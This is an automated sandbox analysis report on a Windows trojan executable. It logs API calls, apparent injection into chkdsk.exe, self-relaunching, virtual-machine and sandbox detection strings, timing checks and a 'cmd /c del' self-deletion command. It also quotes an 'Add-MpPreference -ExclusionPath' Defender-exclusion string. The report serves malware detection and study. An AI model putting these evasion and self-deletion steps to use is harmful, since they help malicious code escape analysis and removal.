          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe, Code function: 3_2_004185E0 NtCreateFile,
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe, Code function: 3_2_00418690 NtReadFile,
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe, Code function: 3_2_00418710 NtClose,
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe, Code function: 3_2_004187C0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe, Code function: 3_2_004185DA NtCreateFile,
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe, Code function: 3_2_0041870C NtClose,
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 10_2_04DC95D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 10_2_04DC9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 10_2_04DC96D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 10_2_04DC96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 10_2_04DC9650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 10_2_04DC9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 10_2_04DC9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 10_2_04DC9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 10_2_04DC9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 10_2_04DC9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 10_2_04DC9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 10_2_04DC99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 10_2_04DC9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 10_2_04DC9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 10_2_04DC95F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 10_2_04DC9560 NtWriteFile,
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 10_2_04DCAD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 10_2_04DC9520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 10_2_04DC9670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 10_2_04DC9610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 10_2_04DC97A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 10_2_04DCA770 NtOpenThread,
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 10_2_04DC9770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 10_2_04DC9760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 10_2_04DCA710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 10_2_04DC9730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 10_2_04DC98F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 10_2_04DC98A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 10_2_04DCB040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 10_2_04DC9820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 10_2_04DC99D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 10_2_04DC9950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 10_2_04DC9A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 10_2_04DC9A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 10_2_04DC9A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 10_2_04DC9A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 10_2_04DCA3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 10_2_04DC9B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 10_2_04AA85E0 NtCreateFile,
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 10_2_04AA8690 NtReadFile,
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 10_2_04AA87C0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04AA8710 NtClose,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04AA85DA NtCreateFile,
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04AA870C NtClose,
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.346719302.00000000038B9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUI.dllF vs GV8EJooYMIgEnEk.exe
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.345190906.00000000005F2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameStructuralEqualityCompar.exe2 vs GV8EJooYMIgEnEk.exe
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.345998808.0000000002965000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSafeSerializationManager.dll: vs GV8EJooYMIgEnEk.exe
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.345759708.00000000028B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSafeSerializationManager.dll: vs GV8EJooYMIgEnEk.exe
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.349469695.0000000007000000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameUI.dllF vs GV8EJooYMIgEnEk.exe
          Source: GV8EJooYMIgEnEk.exe, 00000003.00000000.341708297.0000000000DE2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameStructuralEqualityCompar.exe2 vs GV8EJooYMIgEnEk.exe
          Source: GV8EJooYMIgEnEk.exe, 00000003.00000002.416179493.00000000019CF000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs GV8EJooYMIgEnEk.exe
          Source: GV8EJooYMIgEnEk.exe, 00000003.00000002.415711074.0000000001696000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCHKDSK.EXEj% vs GV8EJooYMIgEnEk.exe
          Source: GV8EJooYMIgEnEk.exe, 00000003.00000002.415965180.000000000183F000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs GV8EJooYMIgEnEk.exe
          Source: GV8EJooYMIgEnEk.exeBinary or memory string: OriginalFilenameStructuralEqualityCompar.exe2 vs GV8EJooYMIgEnEk.exe
          Source: GV8EJooYMIgEnEk.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: GV8EJooYMIgEnEk.exeVirustotal: Detection: 60%
          Source: GV8EJooYMIgEnEk.exeMetadefender: Detection: 20%
          Source: GV8EJooYMIgEnEk.exeReversingLabs: Detection: 62%
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeFile read: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe:Zone.IdentifierJump to behavior
          Source: GV8EJooYMIgEnEk.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe "C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe"
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeProcess created: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\chkdsk.exe C:\Windows\SysWOW64\chkdsk.exe
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeProcess created: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe"
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\GV8EJooYMIgEnEk.exe.logJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@7/5
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6120:120:WilError_01
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: GV8EJooYMIgEnEk.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: GV8EJooYMIgEnEk.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: GV8EJooYMIgEnEk.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: chkdsk.pdbGCTL source: GV8EJooYMIgEnEk.exe, 00000003.00000002.415690585.0000000001690000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: chkdsk.pdb source: GV8EJooYMIgEnEk.exe, 00000003.00000002.415690585.0000000001690000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: GV8EJooYMIgEnEk.exe, 00000003.00000002.415809187.0000000001720000.00000040.00000800.00020000.00000000.sdmp, GV8EJooYMIgEnEk.exe, 00000003.00000002.415965180.000000000183F000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: GV8EJooYMIgEnEk.exe, 00000003.00000002.415809187.0000000001720000.00000040.00000800.00020000.00000000.sdmp, GV8EJooYMIgEnEk.exe, 00000003.00000002.415965180.000000000183F000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, chkdsk.exe, 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: StructuralEqualityCompar.pdb source: GV8EJooYMIgEnEk.exe

          Data Obfuscation

          Source: GV8EJooYMIgEnEk.exe, i8/By.cs | .Net Code: x8k System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 0.0.GV8EJooYMIgEnEk.exe.590000.0.unpack, i8/By.cs | .Net Code: x8k System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 0.2.GV8EJooYMIgEnEk.exe.590000.0.unpack, i8/By.cs | .Net Code: x8k System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 3.0.GV8EJooYMIgEnEk.exe.d80000.3.unpack, i8/By.cs | .Net Code: x8k System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 3.0.GV8EJooYMIgEnEk.exe.d80000.1.unpack, i8/By.cs | .Net Code: x8k System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 3.2.GV8EJooYMIgEnEk.exe.d80000.1.unpack, i8/By.cs | .Net Code: x8k System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 3.0.GV8EJooYMIgEnEk.exe.d80000.2.unpack, i8/By.cs | .Net Code: x8k System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 3.0.GV8EJooYMIgEnEk.exe.d80000.5.unpack, i8/By.cs | .Net Code: x8k System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 3.0.GV8EJooYMIgEnEk.exe.d80000.0.unpack, i8/By.cs | .Net Code: x8k System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 3.0.GV8EJooYMIgEnEk.exe.d80000.9.unpack, i8/By.cs | .Net Code: x8k System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 3.0.GV8EJooYMIgEnEk.exe.d80000.7.unpack, i8/By.cs | .Net Code: x8k System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe | Code function: 0_2_07164FF9 push es; retf
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe | Code function: 0_2_0716C325 push FFFFFF8Bh; iretd
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe | Code function: 3_2_0041B822 push eax; ret
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe | Code function: 3_2_0041B82B push eax; ret
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe | Code function: 3_2_0041B88C push eax; ret
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe | Code function: 3_2_00419178 push ebp; iretd
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe | Code function: 3_2_0041A10B push edi; retf
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe | Code function: 3_2_0041A2A7 push ebx; retf
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe | Code function: 3_2_00415C52 pushad ; ret
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe | Code function: 3_2_0041CCCE push es; iretd
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe | Code function: 3_2_0041B7D5 push eax; ret
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 10_2_04DDD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 10_2_04AACCCE push es; iretd
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 10_2_04AA5C52 pushad ; ret
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 10_2_04AAB7D5 push eax; ret
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 10_2_04AAB88C push eax; ret
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 10_2_04AAB82B push eax; ret
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 10_2_04AAB822 push eax; ret
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 10_2_04AAA10B push edi; retf
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 10_2_04AA9178 push ebp; iretd
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 10_2_04AAA2A7 push ebx; retf
          Source: initial sample | Static PE information: section name: .text entropy: 7.78260076892

          Hooking and other Techniques for Hiding and Protection

          Source: C:\Windows\SysWOW64\chkdsk.exe | Process created: /c del "C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe" (2 identical entries)
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe | Process information set: NOOPENFILEERRORBOX (37 identical entries)
          Source: C:\Windows\SysWOW64\chkdsk.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: Yara match | File source: 0.2.GV8EJooYMIgEnEk.exe.28fd388.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.GV8EJooYMIgEnEk.exe.2979c1c.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000000.00000002.345998808.0000000002965000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.345759708.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: Process Memory Space: GV8EJooYMIgEnEk.exe PID: 6024, type: MEMORYSTR
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.345998808.0000000002965000.00000004.00000800.00020000.00000000.sdmp, GV8EJooYMIgEnEk.exe, 00000000.00000002.345759708.00000000028B1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: SBIEDLL.DLL
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.345998808.0000000002965000.00000004.00000800.00020000.00000000.sdmp, GV8EJooYMIgEnEk.exe, 00000000.00000002.345759708.00000000028B1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe | RDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe | RDTSC instruction interceptor: First address: 000000000040899E second address: 00000000004089A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\chkdsk.exe | RDTSC instruction interceptor: First address: 0000000004A98604 second address: 0000000004A9860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\chkdsk.exe | RDTSC instruction interceptor: First address: 0000000004A9899E second address: 0000000004A989A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe TID: 4632 | Thread sleep time: -35216s >= -30000s
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe TID: 5632 | Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 5248 | Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\SysWOW64\chkdsk.exe | Last function: Thread delayed
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe | Code function: 3_2_004088D0 rdtsc
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\chkdsk.exe | API coverage: 9.5 %
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe | Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe | Thread delayed: delay time: 35216
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe | Thread delayed: delay time: 922337203685477
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.345759708.00000000028B1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
          Source: explorer.exe, 00000005.00000000.384317833.00000000047D0000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Prod_VMware_SATA
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.345759708.00000000028B1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000005.00000000.356094348.00000000086C9000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.345759708.00000000028B1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: vmware
          Source: explorer.exe, 00000005.00000000.356172587.0000000008778000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
          Source: explorer.exe, 00000005.00000000.356094348.00000000086C9000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
          Source: explorer.exe, 00000005.00000000.352537761.00000000067C2000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.352537761.00000000067C2000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
          Source: explorer.exe, 00000005.00000000.356094348.00000000086C9000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.345759708.00000000028B1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe | Code function: 3_2_004088D0 rdtsc
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe | Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 10_2_04E06CF0 mov eax, dword ptr fs:[00000030h] (3 identical entries)
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 10_2_04E414FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 10_2_04E58CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 10_2_04D9849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 10_2_04DBA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 10_2_04E1C450 mov eax, dword ptr fs:[00000030h] (2 identical entries)
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 10_2_04DA746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 10_2_04E41C06 mov eax, dword ptr fs:[00000030h] (14 identical entries)
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 10_2_04E5740D mov eax, dword ptr fs:[00000030h] (3 identical entries)
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 10_2_04E06C0A mov eax, dword ptr fs:[00000030h] (4 identical entries)
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 10_2_04DBBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 10_2_04E4FDE2 mov eax, dword ptr fs:[00000030h] (4 identical entries)
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 10_2_04E38DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 10_2_04E06DC9 mov eax, dword ptr fs:[00000030h] (3 identical entries)
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 10_2_04E06DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 10_2_04E06DC9 mov eax, dword ptr fs:[00000030h] (2 identical entries)
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 10_2_04D9D5E0 mov eax, dword ptr fs:[00000030h] (2 identical entries)
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 10_2_04DBFD9B mov eax, dword ptr fs:[00000030h] (2 identical entries)
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 10_2_04E505AC mov eax, dword ptr fs:[00000030h] (2 identical entries)
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 10_2_04D82D8A mov eax, dword ptr fs:[00000030h] (5 identical entries)
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 10_2_04DB2581 mov eax, dword ptr fs:[00000030h] (4 identical entries)
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 10_2_04DB1DB5 mov eax, dword ptr fs:[00000030h] (3 identical entries)
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 10_2_04DB35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 10_2_04DA7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 10_2_04DC3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 10_2_04E03540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 10_2_04DAC577 mov eax, dword ptr fs:[00000030h] (2 identical entries)
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 10_2_04E58D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 10_2_04E0A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 10_2_04E4E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 10_2_04DB4D3B mov eax, dword ptr fs:[00000030h] (3 identical entries)
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 10_2_04D8AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 10_2_04D93D34 mov eax, dword ptr fs:[00000030h] (13 identical entries)
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 10_2_04DB36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 10_2_04DC8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 10_2_04E3FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 10_2_04E58ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 10_2_04DB16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 10_2_04D976E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 10_2_04E50EA5 mov eax, dword ptr fs:[00000030h] (3 identical entries)
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 10_2_04E046A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 10_2_04E1FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 10_2_04D97E41 mov eax, dword ptr fs:[00000030h] (6 identical entries)
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 10_2_04E4AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 10_2_04E4AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DAAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DAAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DAAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DAAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DAAE73 mov eax, dword ptr fs:[00000030h]
